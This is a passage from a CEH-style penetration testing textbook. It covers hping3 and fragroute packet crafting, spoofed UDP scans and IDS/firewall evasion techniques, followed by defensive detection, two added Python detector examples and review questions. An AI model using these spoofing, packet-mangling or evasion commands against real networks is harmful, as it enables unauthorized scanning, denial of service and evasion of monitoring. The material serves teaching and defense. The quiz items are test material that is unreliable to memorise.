While you can use hping as a replacement for the ping program, by calling it with the -1 parameter, meaning you are using ICMP mode, you can also create connections to specific ports. You will get the same behavior you would get with the ping program, meaning you will be getting the "aliveness" of the system and the round-trip time. You will get something even more detailed, though, since you will know whether a particular service is up and running. This may be useful if you are doing testing against an application. You may want to know when the service fails. You will get a lot of detail from the response, in addition to the round-trip time. You can see in the following code listing a run of hping3 against a web server on a target system.

Sending SYN Messages to a Target System

[email protected]:~# hping3 -S -p 80 192.168.86.1
HPING 192.168.86.1 (eth0 192.168.86.1): S set, 40 headers + 0 data bytes
len=46 ip=192.168.86.1 ttl=64 DF id=0 sport=80 flags=SA seq=0 win=29200 rtt=7.9 ms
len=46 ip=192.168.86.1 ttl=64 DF id=0 sport=80 flags=SA seq=1 win=29200 rtt=7.9 ms
len=46 ip=192.168.86.1 ttl=64 DF id=0 sport=80 flags=SA seq=2 win=29200 rtt=7.6 ms
len=46 ip=192.168.86.1 ttl=64 DF id=0 sport=80 flags=SA seq=3 win=29200 rtt=7.5 ms
len=46 ip=192.168.86.1 ttl=64 DF id=0 sport=80 flags=SA seq=4 win=29200 rtt=7.3 ms
len=46 ip=192.168.86.1 ttl=64 DF id=0 sport=80 flags=SA seq=5 win=29200 rtt=3.0 ms
len=46 ip=192.168.86.1 ttl=64 DF id=0 sport=80 flags=SA seq=6 win=29200 rtt=2.8 ms
len=46 ip=192.168.86.1 ttl=64 DF id=0 sport=80 flags=SA seq=7 win=29200 rtt=2.7 ms
len=46 ip=192.168.86.1 ttl=64 DF id=0 sport=80 flags=SA seq=8 win=29200 rtt=2.5 ms
len=46 ip=192.168.86.1 ttl=64 DF id=0 sport=80 flags=SA seq=9 win=29200 rtt=2.4 ms
len=46 ip=192.168.86.1 ttl=64 DF id=0 sport=80 flags=SA seq=10 win=29200 rtt=2.2 ms

hping will provide you with all of the flags that are set in the response. This includes the SYN and ACK flags as well as the don't fragment bit, indicated by the DF in the response. You can see a lot of other details as well, including the IP identification number, the relative sequence number, and the window size as provided by the target host. In the case of a port where there is no listener, you won't get a message indicating that the host is unreachable or that the message timed out, as you would with a standard ping program. Instead, you will get the same response that you got from an open port. Instead of showing SA for flags, meaning that the SYN and ACK flags were set, you will see RA, meaning the RST and ACK flags. The remote system reset the port, telling us that there is no application there. You will still get all of the other information, including the round-trip time, which will tell you how quick the target system is to respond to these messages, which will be a factor of network and operating system responsiveness.
Raw sockets provide programmers with the ability to bypass the network stack. When a programmer uses raw sockets, the program is expected to handle all the things the network stack does, meaning all the values in the headers should be set. Raw sockets provide the programmer with complete control over what the packet will end up looking like. None of it has to be considered legal from the standpoint of the protocols, if you aren't expecting responses. This is not to say that you will always get a response, though. You could completely mangle the message to the target host. As one example, take a look at the command line below. The offset for the TCP headers is being set incorrectly, which means the target network stack is being pointed to the wrong place. Also, the SYN and FIN flags are both set, as well as the ACK and PSH flags. This is a flag combination that makes no sense. The source port is being set to 15, which would require administrative privileges to do, as do most things in hping, considering it is generally using something called raw sockets.

hping with Bad Flags Set

[email protected]:~# hping3 -O 8 -s 15 -F -S -P -A -t 3 -p 80 192.168.86.1
HPING 192.168.86.1 (eth0 192.168.86.1): SAFP set, 40 headers + 0 data bytes
^C
--- 192.168.86.1 hping statistic ---
19 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

In addition to ICMP and TCP, you can send UDP messages. There are fewer parameters used to send UDP messages because of the limited number of options available in the UDP headers. We can, though, use hping to perform a port scan. We can scan a range of UDP ports by using the --scan (or -8) parameter. You can see this done in the following code. Using --scan, we need to specify the ports being targeted. This scan targets the administrative ports 1–1023. There are no ports listening on this host in that range. What was truncated from the output was all of the port numbers and associated service names that were found not to be listening. One other feature of hping is the ability to spoof addresses. Using the -a parameter, followed by an IP address, will have hping change the source address in messages going out. This will mean that you won't get any responses, because responses will be sent to the source address you specify.

UDP Port Scan with hping

[email protected]:~# hping3 --scan 1-1023 -a 10.15.24.5 -2 192.168.86.1
Scanning 192.168.86.1 (192.168.86.1), port 1-1024
1024 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name |  flags  |ttl| id  | win | len |
+----+-----------+---------+---+-----+-----+-----+
All replies received. Done.
Not responding ports: (1 tcpmux) (2 nbp) (3 ) (4 echo) (5 ) (6 zip) (7 echo) (8 ) (9 discard) (10 ) (11 systat) (12 ) (13 daytime) (14 ) (15 netstat) (16 ) (17 qotd) (18 msp) (19 chargen) (20 ftp-data) (21 ftp) (22 ssh) (23 telnet) (24 )

One other feature worth mentioning is the ability to send packets of any size you want. To change the size of the data being sent, you would use -d followed by a byte count. This sets the body size of the packet in the headers. You can also fill the packets by specifying a filename using the --file parameter. This will read the contents of the file and use them to fill the data portion of the packet. You may be able to crash the application because the data being sent could violate protocol specifications.

packETH

Where hping uses command-line parameters, packETH takes a GUI approach to being able to set all the parameters. The sets of headers vary, depending on the protocols selected, and each of the lower-layer headers indicates the next protocol, meaning the next set of headers. When you select which protocols you are using, packETH will adjust to provide all of the header fields for the protocol you have selected. Figure 5.25 shows the IP header fields as well as the TCP header fields. You will also see where IP is selected as the next protocol in the layer 2 header. You can't see the layer 2 header in this screen capture, but you would be able to set addresses, determine what version of the layer 2 protocol you are using, and also add in 802.1q fields, which provide a tag field to indicate which virtual LAN (VLAN) the frame should be on.

FIGURE 5.25 packETH interface

In addition to setting headers, you can add your own data that would go into the payload. You don't need to have data to include, though, if you would prefer to just have data filled in to a certain size. Figure 5.26 shows the TCP headers filled in with the data payload also filled in. On the right side of the screen capture, you can see two edit boxes. One of them is the data pattern, which is expected to be in hexadecimal. The other one is the number of instances of the pattern provided. The first field is set to ab, and the number of iterations is set to 500. Once you have the pattern and number, you apply the pattern and your data payload will be filled in. You'll notice that it is formatted just as you'd expect a hexadecimal dump to be formatted, with each hexadecimal byte separated from the others.

FIGURE 5.26 Data pattern fill

While you can create packets following known and understood fields, you can also create your own packets. Your layer 2 headers have to be set with MAC addresses in the source and destination so there is somewhere for the frame to go, but beyond that, you can do whatever you like by selecting User Defined Payload. This would leave out all layer 3 information and only include what you wanted to include, whether it's text or a hexadecimal fill pattern. Figure 5.27 shows a payload created using a pattern. Using text caused an error with the next-layer protocol specified because it's not set up to take raw text. You need to create a hexadecimal pattern instead. You'll see at the bottom of the screen capture that 60 bytes were sent, which includes the network layer payload we specified.

Once you have your packet built, you can send it. Clicking the Send button in the toolbar will send a single packet. If you want to send more than a single packet, you will have to use either the Gen-b or Gen-s button. Gen-b gives you the ability to specify the number of packets to send. You'll be able to indicate the bandwidth you want to use, or you could also indicate the inter-packet gap, which is the delay between packets being sent. Gen-s gives you the ability to generate streams. A stream can be a defined pattern of packets that have been saved to different files. Once you have the pattern defined by indicating the packets you want to use, you can tell packETH how you want to send them—burst, continuous, or random. You can also indicate the total number of packets you want to send as well as the delay. Speaking of loading packets from a file, you can save the packets you create. This allows you to create a number of packets and load them into Gen-s mode, but it also allows you to create a packet and load it up to send it any time you want without having to re-create the packet. If you want to use an existing packet you have captured as your starting point, you can also load a packet capture (PCAP) file. When you select a frame from the list in the PCAP view, that frame will show up in the Builder view.

FIGURE 5.27 Network layer data fill

fragroute

fragroute is a program used to mangle packets before they are sent to a target you specify. It works by making adjustments to the routing table so all messages going to the target are sent through the fragroute application first. To make fragroute work, you need to create a configuration file. This configuration file has directives telling fragroute how to handle packets that pass through the application. In the following code listing, you can see a configuration file with a handful of directives that are guaranteed to create really messed-up network traffic.

fragroute Configuration File

[email protected]$ cat frag.conf
delay random 1
dup last 30%
ip_chaff dup
ip_frag 128 new
tcp_chaff null 16
order random
print

The directives here tell fragroute to do a number of things to packets. The first thing is to delay random packets by 1 millisecond. Next, there is a 30 percent chance of duplicating the last packet. The ip_chaff line adds duplicate packets into the queue. When messages are sent out, they have a maximum transmission unit (MTU) size that is dictated by the data link protocol. With Ethernet, that is 1,500 bytes, though it's possible to get something called jumbo frames that are much larger. More commonly, you will see an MTU of 1,500. Any message that is larger than the MTU gets fragmented. Using fragroute, though, we are going to force the packets to get fragmented before sending. That happens in the ip_frag 128 new line. We will be fragmenting at 128 bytes, which is enough for header data and a little bit more. Anything large being sent, such as an image file, will have a large number of fragments. The line starting with tcp_chaff does the same thing that ip_chaff does, working instead on the Transport layer. The TCP segments being inserted will have null TCP flags, as specified in the configuration. We could also have had invalid checksums, older timestamps, or other bogus information in the TCP header. This would have caused these messages to be rejected on the far end of the conversation, after inspection. Finally, the order of the messages will be randomized, so they will be out of order and need reassembly on the far end, and then message details will be printed.

Using a simpler configuration file, you can see a run of fragroute in the following code listing. This is the configuration file that was installed by default with the fragroute package on a Kali Linux system. This configuration file uses tcp_seg to break up TCP data into specified segment sizes. After that, it uses ip_frag and ip_chaff as mentioned earlier. Then, it will set an order and print the message details, which you can see.

fragroute Run against Target

[email protected]:~# fragroute -f /etc/fragroute.conf 184.159.210.190
fragroute: tcp_seg -> ip_frag -> ip_chaff -> order -> print
192.168.86.57.18294 > 184.159.210.190.17766: SR 1400140884:1400140908(24) ack 1802781559 win 14416 urg 21625 [delay 0.001 ms]
192.168.86.57.43460 > 184.159.210.190.4433: S 2873730507:2873730507(0) win 29200
192.168.86.57.21314 > 184.159.210.190.29050: S 810642531:810642543(12) ack 1802326352 win 27514 [delay 0.001 ms]
192.168.86.57.43460 > 184.159.210.190.4433: S 2873730507:2873730507(0) win 29200
192.168.86.57.19306 > 184.159.210.190.22387: R 1297315948:1297315960(12) ack 2020107846 win 19767 urg 31041 [delay 0.001 ms]
192.168.86.57.43460 > 184.159.210.190.4433: S 2873730507:2873730507(0) win 29200
192.168.86.57.26963 > 184.159.210.190.21350: SFP 1950696520:1950696548(28) win 27988 urg 20558 [delay 0.001 ms]

What you will likely notice when you use fragroute is that what you are trying to do to interact with the target will fail. In the preceding example, I used openssl s_client to initiate a connection with the web server using SSL/TLS. The connection never completed, presumably because the packets getting to the target were so mangled and out of order that the network stack didn't know what to make of them. The point of running fragroute, though, isn't necessarily to make the connection. Sometimes, the point is just to see if you can make the network stack on the target system fail, which may take the kernel with it, causing the entire system to be unavailable, forcing a reboot or restart.

Evasion Techniques

Any target organization you test against will have security mechanisms in place to defend itself. This may be firewalls or intrusion detection systems. It may also have intrusion prevention systems. Any of these could thwart your efforts by either blocking them or by issuing an alert, which may result in the discovery of your actions. Either of these would be bad things. Fortunately, there are some evasion techniques that may help you get around these devices so you can keep plugging along. Some of the tools we have already looked at will help you with these evasive procedures. The common evasion techniques are as follows:

Hide/Obscure the Data  You could use encryption or obfuscation to disguise what you are doing. Encrypted traffic can't be investigated without violating the end-to-end nature of encryption. The goal with encryption is that the message is encrypted from the sender to the recipient, without being decrypted at waypoints in between. You could also encode the data using various encoding techniques, including URL encoding, which replaces characters with the hexadecimal value of their ASCII code.

Alterations  Intrusion detection/protection systems in particular will often use something called a signature. In the case of malware, this may be a cryptographic hash value that can be compared against a database of known malware. If there is a match of the hash, the messages can get dropped. When it comes to a cryptographic hash, though, the change of a single character in the file contents will yield a completely different hash value, meaning whatever you are doing won't get detected. This strategy is commonly called polymorphism, from polymorph, meaning many shapes or forms.

Fragmentation  Fragmentation attacks can be used to evade network security mechanisms simply because these devices, when they are inline, would take time to reassemble the messages before the adversarial activity would be seen. This reassembly takes time and so some devices just don't bother because the reassembly and detection can add latency to communications. This depends on the device and decisions made by the developers of the device. You can use a tool like fragroute to help you with the fragmentation.

Overlaps  When messages are fragmented, it may happen at either the Network layer or the Transport layer, as you saw from looking at fragroute. When the messages need to be reassembled, all of the pieces need to be there and in a sane state so the puzzle can be fit back together. When using TCP, you can overlap sequence numbers. This is essentially the byte count that has been sent. You may send two TCP segments that appear to occupy the same space in the puzzle being put back together. The IDS and the target OS may decide to put the puzzle back together differently. This may happen if one decides to favor the newer information while the other favors the older. The OS needs to decide whether the first message received was valid or the last message received was more valid.

Malformed Data  Protocols are sets of rules about how communications are expected to happen. If you violate those rules, you can get unexpected results. Even if you aren't violating the rules but instead are taking advantage of loopholes, you can get some useful data. This is why nmap uses Xmas, FIN, and NULL scans. The behavior is unexpected, though not technically illegal from the standpoint of the protocol. Similarly, there are details in the protocols that may be handled differently across different network stacks. The URG pointer may be handled differently across different operating systems. This could be used to get around an IDS and still have the target system respond the way you want.

Low and Slow  Fast scans can be easy to detect. Harder to detect are scans that are taking place over a long time frame. Imagine a single scan packet being sent once an hour. This can be very time-consuming to perform, but when you are talking about individual messages, it's far less likely that the IDS or firewall would identify them as a port scan. Taking your time can be beneficial. You could use the nmap throttling parameter to really slow your scans down.

Resource Consumption  It may be possible to get devices to fail open by consuming resources such as CPU or memory. If you can exhaust either of these resources, it may be possible to get subsequent messages to just pass through once the device has failed.

Screen Blindness  In the case of IDS, the device or software will issue alerts. It is expected there will be someone looking at those alerts. If you can generate enormous volumes of alerts from traffic you don't care about, you can cause the people looking at the alerts to go screen blind, meaning they just aren't seeing the important details anymore because they are overwhelmed by what they are looking at. This way, you can set up a smoke screen with a lot of bogus alert traffic and then send your real data through the screen.

Tunneling  A tunnel is a way of transmitting data inside something else. For example, the Generic Routing Encapsulation (GRE) protocol can create a tunnel by taking packets and encapsulating them inside GRE packets. This makes it look like what is passing through is a GRE packet when there is really something in the payload. GRE is a protocol that has been designed to tunnel traffic in cases where you want to handle the routing on the receiving end rather than the sending end. Other protocols have been used for tunneling attacks, including SSH, HTTP, ICMP, and DNS. These tunneled attacks require software on the receiving end that can extract the tunneled messages and place them on the target network. Keep in mind that with devices like stateful firewalls, once you get the first message through, subsequent messages may be allowed by default because they are part of an established connection.

Of course, these techniques for evasion have all been around for a very long time, so it's possible that the firewall or IDS vendor knows how to detect most of them. This means you may not be able to make the evasions work. It is still worth knowing about them and trying them to see if you can get through. There are some that are more likely to work than others, because they don't rely on the firewall or IDS vendor. Encryption, for instance, should always work because the firewall and IDS simply can't see the data since the keys are negotiated by the two endpoints. Encryption, though, requires a service on the receiving end that understands encryption and can negotiate with the sending application. An evasion technique that doesn't rely on technical means is overwhelming the person looking at the alerts. This does, though, assume that there isn't technology in place to weed out the extraneous messages, only presenting interesting alerts to the operator.

nmap has its own evasions built in, to a degree. There are the ones that are mentioned earlier, with what are essentially malformed requests. These are packet configurations that simply shouldn't exist in the real world. The expectation is that using these packet configurations, the network security in place may simply ignore them. Unfortunately, these are so well-known that firewalls and intrusion detection systems are more than capable of seeing these messages. One that may be harder to see is the idle scan, which makes use of a system that isn't communicating on the network. This allows nmap to calculate the correct IP identification number that should be received based on the system having to respond with reset messages to packets from the target.

The way the idle scan works is the system performing the scan spoofs messages, making it look like the messages are coming from an idle system. The receiving system then sends all responses to the idle system, while the scanning system periodically sends a message to the idle system to get the current IP identification value. Based on this, the sending system can determine what packets may have been received and sent since the sending system knows what it sent out. While the scan can be easily seen by firewalls or detection systems, what won't be seen is where the scan originated from. If the scanner uses a victim, or idle, system that has nothing to do with the scanner, it won't be clear who is actually performing the scan, even if the fact of the scan is picked up. The person, say you for instance, doing the scan will be hidden because the scan is blind.

Protecting and Detecting

All of this is on the offensive side, where you will be looking for footholds or pieces of information you can use later. One thing to keep in mind when it comes to working with a client is your job is not just to break into systems and find weaknesses. You will be expected to provide recommendations on how to keep other people from following the paths that you used to get into systems. This means you not only need to know how to break in, but you also need to know how to keep yourself from breaking in.

Fortunately, when it comes to scanning, it's not that hard to protect against or at least detect activities like port scans. They are noisy, even if you are using a low and slow approach with long waits between packets going out. Sending requests to 1,000 ports over any period of time is going to be a little strange. While nmap refers to them as well-known ports, that's a comparative term. In reality, there are a handful of ports, considerably less than 1,000, that are in common use. Let's say that there are 20 ports, for the sake of the argument, that you would expect to see on your network, given everything that happens there. That leaves 980 ports that you should never see messages for on your network. Any time you see any of those 980 ports getting requests, much less all of them, something is probably amiss. You can block all of that traffic, but you can also detect it. This may be done with either the firewall or a network intrusion detection system.

Vulnerability scanners are similarly noisy. Even in cases where the scanner knows the ports/applications ahead of time, there are a lot of requests that are going out. Almost all of them are going to look bad. This is where an intrusion detection system can help out. You may not be able to, or even want to, block traffic from a vulnerability scanner because, in reality, it will be or at least look like a legitimate request. You may be able to notice, though, that the requests match known vulnerabilities. Network intrusion detection systems should be able to detect this type of activity.

When it comes to attacks like packet crafting or spoofing attacks, there are ways to protect against these as well. Perimeter firewalls should be blocking traffic that should never happen. This includes private addresses from the RFC 1918 space, which are not, by convention, routable over the Internet. If an address can't come in over the Internet, anything with one of those addresses that comes in from the Internet can't be legitimate. Similarly, a spoofing attack, say from an idle scan, may appear to come from an inside host. Any address that lives on the inside of the network can't possibly originate from the outside, so those should be blocked as well.

Summary

Scanning will provide you with a wealth of information that will be necessary as you move forward with your testing and evaluation. There are different types of scanning, however. As you are scanning, you will want to identify ports that are open. The purpose of identifying open ports isn't just to get a list of ports. Ultimately, you want to identify the services or applications that are listening on the open ports. To identify these open ports, you would use a port scanner. The most commonly used port scanner is nmap, which can be used for more than just identifying open ports. It can also be used to identify application versions by grabbing banners. Also, nmap can identify the operating system running on the target. While there are other port scanners available, including masscan, which is used for high-speed scanning, nmap is the only port scanner that has a scripting engine built into it. The scripting engine for nmap is based on the programming language Lua, but nmap provides libraries that will give you easy access to the information nmap has so you can write scripts to better identify services and also perform tests such as identifying vulnerabilities. When you write scripts for the nmap scripting engine (NSE), you register ports with nmap so nmap knows to call your script when it finds the registered port to be open.

While nmap is commonly a command-line program, there is also a GUI that acts as a front end for nmap. Zenmap is a program that will call nmap based on a command specified, but it will also parse the results, providing them to you in different ways. You can look at all the services that were identified. You can also get a look at a topology of the network based on what nmap finds. While you can provide the same command to Zenmap as you do to nmap, Zenmap will also provide some scan types that you can run, like an intense scan. Selecting the scan type will fill in the needed command-line parameters.

Vulnerability scanners will not only look for vulnerabilities, they will also generally perform port scanning as part of looking for and identifying open ports. There are a number of vulnerability scanners available commercially. Very few vulnerability scanners exist that are open source. One, based on one that is now commercial, is OpenVAS. OpenVAS was forked from the last open source version of Nessus. One of the challenges of vulnerability scanners is the vast amount of work it takes to maintain them and keep them up to date, which is perhaps a primary reason why there are very few open source scanners. Vulnerability scanners, like OpenVAS and Nessus, use plugins to perform tests. They probe the targeted host to observe behavior on the host to identify potential vulnerabilities. Not all identified vulnerabilities are real, however. Vulnerabilities that are identified by scanners but aren't real are called false positives. A false negative would be a vulnerability that did exist but wasn't identified. Vulnerability scanners are far from infallible because of the way they work. It may require manual work to validate the findings from a vulnerability scanner.

To test vulnerabilities and also perform scans, you may need to do something other than relying on the operating system to build your packets for you. There are multiple tools that you can use to craft packets, such as hping. This is a tool that can be used for scanning but also can be used to create packets using command-line switches. If you would prefer not to use the command line, you can use a tool like packETH. packETH presents you with all the headers at layers 2 through 4. You can also create a payload to go in the packet. packETH will also let you extract packets from a PCAP and then make changes to them. You can send individual packets to a target—either layer 2 or layer 3—or you could send streams. Using these crafted packets, you can get responses from your target that may provide you with necessary information.

Your target networks will likely have firewalls and an IDS installed. You will probably want to use techniques to evade those devices since they will likely prevent you from doing your job. There are multiple ways to evade security technologies, including encryption/encoding, causing the operator to go screen blind, or sending malformed messages to the target.

The best way to protect against these scans, whether they are port scans or vulnerability scans, is to use firewalls on the ingress of networks, which includes network segments like a virtual local area network. You may not always be able to protect against, meaning block, all of these tactics. This is where an IDS comes in handy, to let someone know something bad is happening.
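The Overlaps entry under Evasion Techniques says an IDS and a target OS may reassemble overlapping TCP segments differently. The following added example (not code from the book) rebuilds a stream under a favor-first and a favor-last policy to show the disagreement, and adds the check an IDS can apply without guessing the target's policy; the segments and the signature pattern are constructed for the demo.

```python
"""Added example, not code from the book: reassemble overlapping TCP
segments under two policies (favor the first bytes received, or favor the
last) to show why an IDS and a target OS can rebuild different streams, and
a check an IDS can apply without guessing the target's policy. Segments and
the signature are constructed for the demo."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Segment:
    seq: int      # relative sequence number: offset of data[0] in the stream
    data: bytes   # payload carried by this segment


def reassemble(segments, policy):
    """Rebuild the byte stream from segments in their delivery order.

    policy "first": a byte already received is kept (older data favored).
    policy "last":  a later segment overwrites earlier bytes (newer favored).
    Positions never received are filled with b"?" so gaps stay visible.
    """
    if policy not in ("first", "last"):
        raise ValueError("policy must be 'first' or 'last'")
    stream = {}
    for seg in segments:
        for i, byte in enumerate(seg.data):
            offset = seg.seq + i
            if policy == "last" or offset not in stream:
                stream[offset] = byte
    if not stream:
        return b""
    return bytes(stream.get(i, ord("?")) for i in range(max(stream) + 1))


def conflicting_overlaps(segments):
    """Offsets where two segments carry different bytes for the same
    position. A normalizing IDS can alert on any such conflict instead of
    guessing which policy the target OS applies."""
    seen = {}
    conflicts = set()
    for seg in segments:
        for i, byte in enumerate(seg.data):
            offset = seg.seq + i
            if offset in seen and seen[offset] != byte:
                conflicts.add(offset)
            seen.setdefault(offset, byte)
    return sorted(conflicts)


def signature_hits(segments, pattern):
    """Whether a byte-pattern signature matches under each policy."""
    return {p: pattern in reassemble(segments, p) for p in ("first", "last")}


# Constructed delivery: the second segment re-sends bytes 4..15 with
# different content, so the two policies disagree on the request path.
SEGMENTS = [
    Segment(0, b"GET /index.html "),
    Segment(4, b"/about.html "),
    Segment(16, b"HTTP/1.0\r\n"),
]

if __name__ == "__main__":
    for policy in ("first", "last"):
        print(policy, reassemble(SEGMENTS, policy))
    print("conflicting offsets:", conflicting_overlaps(SEGMENTS))
    print(signature_hits(SEGMENTS, b"/about.html"))
```

A signature written against one reassembly matches under only one policy, while the conflict check fires for either, which is why IDS normalization (or matching the target's known policy) matters more than the signature itself.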
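The Protecting and Detecting section argues that impossible flag combinations, probes to the hundreds of ports nobody uses (even one per hour), and inside or RFC 1918 source addresses arriving from outside can all be blocked or alerted on. The following added example (not code from the book) runs those three checks over constructed connection records; the record format, the expected-port list, the inside address range and the thresholds are assumptions for the demo.

```python
"""Added example, not code from the book: a small detector run over
constructed connection records. It covers three checks the chapter argues
for: TCP flag combinations that should never occur (like the SYN+FIN+PSH+ACK
hping run and nmap's NULL and Xmas probes), a source that slowly touches
many ports nobody uses (low and slow), and traffic on the outside interface
that claims an inside or RFC 1918 source address. The record format,
thresholds and address ranges are assumptions for the demo."""
import ipaddress
from collections import defaultdict

# Assumed: the handful of ports this network legitimately uses. Everything
# else is one of the "980 ports you should never see" from the chapter.
EXPECTED_PORTS = {22, 25, 53, 80, 443}
INSIDE_NETS = [ipaddress.ip_network("192.0.2.0/24")]   # assumed inside range
RFC1918 = [ipaddress.ip_network(n) for n in
           ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
SCAN_WINDOW = 24 * 3600   # seconds; long enough to catch one probe per hour
SCAN_PORTS = 10           # distinct unexpected ports before alerting


def parse(line):
    """Record format (constructed): <epoch> <iface> <src> <dst> <dport> <flags>
    with flags as letters S A F R P U, or '-' for a segment with no flags."""
    ts, iface, src, dst, dport, flags = line.split()
    return {"ts": int(ts), "iface": iface, "src": ipaddress.ip_address(src),
            "dst": dst, "dport": int(dport),
            "flags": frozenset() if flags == "-" else frozenset(flags)}


def flag_problem(flags):
    """Name the impossible combination, or None for a sane flag set."""
    if "S" in flags and "F" in flags:
        return "SYN+FIN"
    if "S" in flags and "R" in flags:
        return "SYN+RST"
    if not flags:
        return "null (no flags)"
    if flags == frozenset("FPU"):
        return "Xmas (FIN+PSH+URG)"
    return None


def spoof_problem(rec):
    """Inside or RFC 1918 addresses cannot legitimately arrive from outside."""
    if rec["iface"] != "ext":
        return None
    if any(rec["src"] in net for net in INSIDE_NETS + RFC1918):
        return "inside/RFC1918 source address on external interface"
    return None


class ScanTracker:
    """Track distinct unexpected ports per source inside SCAN_WINDOW and
    alert once the count reaches SCAN_PORTS, however slowly probes arrive."""

    def __init__(self):
        self.seen = defaultdict(dict)   # src -> {dport: last seen ts}
        self.alerted = set()

    def observe(self, rec):
        if rec["dport"] in EXPECTED_PORTS:
            return None
        ports = self.seen[rec["src"]]
        ports[rec["dport"]] = rec["ts"]
        for port in [p for p, t in ports.items() if rec["ts"] - t > SCAN_WINDOW]:
            del ports[port]               # probe expired from the window
        if len(ports) >= SCAN_PORTS and rec["src"] not in self.alerted:
            self.alerted.add(rec["src"])
            return f"{len(ports)} unexpected ports in {SCAN_WINDOW}s (low-and-slow scan)"
        return None


def analyze(lines):
    """Return one alert string per finding, in record order."""
    tracker = ScanTracker()
    alerts = []
    for line in lines:
        rec = parse(line)
        where = f"{rec['src']} -> {rec['dst']}:{rec['dport']}"
        for problem in (flag_problem(rec["flags"]), spoof_problem(rec),
                        tracker.observe(rec)):
            if problem:
                alerts.append(f"{where}: {problem}")
    return alerts


# Constructed sample records (TEST-NET addresses; 192.168.86.1 is the
# chapter's lab target, used here as a spoofed RFC 1918 source).
SAMPLE = [
    "1000 ext 203.0.113.7 192.0.2.10 443 S",      # normal SYN to a web port
    "1001 ext 203.0.113.9 192.0.2.10 80 SAFP",    # flags from the hping bad-flags run
    "1002 ext 203.0.113.9 192.0.2.10 80 -",       # NULL probe, no flags at all
    "1003 ext 192.168.86.1 192.0.2.10 80 S",      # RFC 1918 source from outside
    "1004 ext 192.0.2.55 192.0.2.10 22 S",        # inside address from outside
    "1005 ext 203.0.113.42 192.0.2.10 443 S",     # expected port: not counted
]
# One probe per hour to ten unused ports from the same source.
SAMPLE += [f"{2000 + i * 3600} ext 203.0.113.42 192.0.2.10 {100 + i} S"
           for i in range(10)]

if __name__ == "__main__":
    for alert in analyze(SAMPLE):
        print(alert)
```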
Review Questions

You can find the answers in the appendix.

1. If you receive a RST packet back from a target host, what do you know about your target?
A. The target is using UDP rather than TCP.
B. The destination port is open on the target host.
C. The source port in the RST message is closed.
D. The target expects the PSH flag to be set.

2. What is the difference between a SYN scan and a full connect scan?
A. A SYN scan and a full connect scan are the same.
B. A full connect scan sends an ACK message first.
C. A SYN scan uses the PSH flag with the SYN flag.
D. The SYN scan doesn't complete the three-way handshake.

3. What is one reason a UDP scan may take longer than a TCP scan of the same host?
A. UDP will retransmit more.
B. UDP has more ports to scan.
C. UDP is a slower protocol.
D. UDP requires more messages to set up.

4. Why does an ACK scan not indicate clearly that ports are open?
A. The scanner has to guess.
B. ACK is not a supported flag.
C. The target system ignores the message.
D. ACK scans cause a lot of retransmits.

5. What is one reason for using a scan like an ACK scan?
A. It may get through firewalls and IDS devices.
B. It is better supported.
C. The code in nmap is more robust.
D. An ACK scan is needed for scripting support.

6. What does nmap look at for fingerprinting an operating system?
A. The operating system headers
B. The application version
C. The response from connecting to port 0
D. The IP ID field and the initial sequence number

7. What is nmap looking at when it conducts a version scan?
A. TCP and IP headers
B. Application banners
C. Operating system kernel
D. IP ID and TCP sequence number fields

8. What is an advantage of using masscan over nmap?
A. masscan has been around longer.
B. nmap is hard to use.
C. masscan can scan more addresses faster.
D. masscan has access to scan more of the Internet.

9. If you were to see hping -S -p 25 10.5.16.2, what would you assume?
A. Someone was trying to probe the web port of the target.
B. Someone was trying to probe an email port on the target.
C. Someone was trying to identify if SNMP was supported on 10.5.16.2.
D. Someone had mistyped ping.

10. If you were to see that someone was using OpenVAS, followed by Nessus, what might you assume?
A. They were trying to break into a system.
B. They didn't know how to use Nessus.
C. They didn't know how to use OpenVAS.
D. They were trying to reduce false positives.

11. What is the difference between a false positive and a false negative?
A. A false positive indicates a finding that doesn't exist, while a false negative doesn't indicate a finding that does exist.
B. A false positive indicates a finding that does exist, while a false negative doesn't indicate a finding that doesn't exist.
C. A false positive doesn't indicate a finding that does exist, while a false negative does indicate a finding that doesn't exist.
D. A false negative does indicate a finding that doesn't exist, while a false positive doesn't indicate a finding that does exist.

12. What would be the purpose of running a ping sweep?
A. You want to identify responsive hosts without a port scan.
B. You want to use something that is light on network traffic.
C. You want to use a protocol that may be allowed through the firewall.
D. All of the above.
13. Which of these may be considered worst practice when it comes to vulnerability scans?
A. Scanning production servers
B. Notifying operations staff ahead of time
C. Taking no action on the results
D. Using limited details in your scan reports

14. Which of these may be considered an evasive technique?
A. Scanning nonstandard ports
B. Encoding data
C. Using a proxy server
D. Using nmap in blind mode

15. If you were to notice operating system commands inside a DNS request while looking at a packet capture, what might you be looking at?
A. Tunneling attack
B. DNS amplification
C. DNS recursion
D. XML entity injection

16. What is an Xmas scan?
A. TCP scan with SYN/ACK/FIN set
B. UDP scan with FIN/PSH set
C. TCP scan with FIN/PSH/URG set
D. UDP scan SYN/URG/FIN set

17. What would you use MegaPing for?
A. Running exploits
B. Running a port scan
C. Issuing manual web requests
D. Crafting packets

18. What would be a reason to use the Override feature in OpenVAS?
A. You want to run a different plugin for a vulnerability.
B. You want to change the scanner settings.
C. You want to use TCP rather than UDP.
D. You want to change a severity rating on a finding.

19. What would you use credentials for in a vulnerability scanner?
A. Better reliability in network findings
B. Authenticating through VPNs for scans
C. Scanning for local vulnerabilities
D. Running an Active Directory scan

20. What is fragroute primarily used for?
A. Altering network routes
B. Capturing fragmented packets
C. Fragmenting application traffic
D. Fragmenting layer 2 and layer 3 headers

Chapter 6
Enumeration

THE FOLLOWING CEH EXAM TOPICS ARE COVERED IN THIS CHAPTER:
✓ Technical assessment methods
✓ Network security
✓ Vulnerabilities
✓ Application/file server

Port scanning is ultimately about identifying applications that are installed on systems within the target network. Once we have identified applications, though, we will want to dig deeper to see what additional information we can extract. This may include user information or details about shares that may be available on the network. Of course, there are other activities we can perform when we start working on enumeration. This information gathering will be beneficial when we start moving to the next stages.

Enumeration is about determining what services are running and then extracting information from those services. The first thing you need to do is identify services that are available on your target systems. Each service may have a lot of information that can be obtained. External-facing services may have authentication requirements, which means there are users. As an example, users may have to be authenticated and authorized to view some sections on a web server. You may be able to get the web server to give you an indication of what usernames are configured on the server, which would be an example of enumeration.

